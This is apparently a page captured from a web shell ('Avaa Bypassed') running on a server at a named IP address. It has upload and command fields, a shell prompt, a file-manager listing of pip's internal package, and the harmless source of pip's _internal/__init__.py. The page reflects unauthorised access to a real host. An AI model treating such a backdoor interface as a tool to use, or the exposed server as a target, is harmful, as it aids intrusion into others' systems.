404

[ Avaa Bypassed ]




Upload:

Command:

botdev@52.14.6.145: ~ $
import pip._internal.utils.inject_securetransport  # noqa
from pip._internal.utils.typing import MYPY_CHECK_RUNNING

if MYPY_CHECK_RUNNING:
    from typing import Optional, List


def main(args=None):
    # type: (Optional[List[str]]) -> int
    """This is preserved for old console scripts that may still be referencing
    it.

    For additional details, see https://github.com/pypa/pip/issues/7498.
    """
    from pip._internal.utils.entrypoints import _wrapper

    return _wrapper(args)

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 2755
cli Folder 2755
commands Folder 2755
distributions Folder 2755
index Folder 2755
models Folder 2755
network Folder 2755
operations Folder 2755
req Folder 2755
resolution Folder 2755
utils Folder 2755
vcs Folder 2755
__init__.py File 495 B 0644
build_env.py File 7.9 KB 0644
cache.py File 11.96 KB 0644
configuration.py File 13.78 KB 0644
exceptions.py File 12.34 KB 0644
locations.py File 6.57 KB 0644
main.py File 437 B 0644
pyproject.py File 7.23 KB 0644
self_outdated_check.py File 6.62 KB 0644
wheel_builder.py File 9.3 KB 0644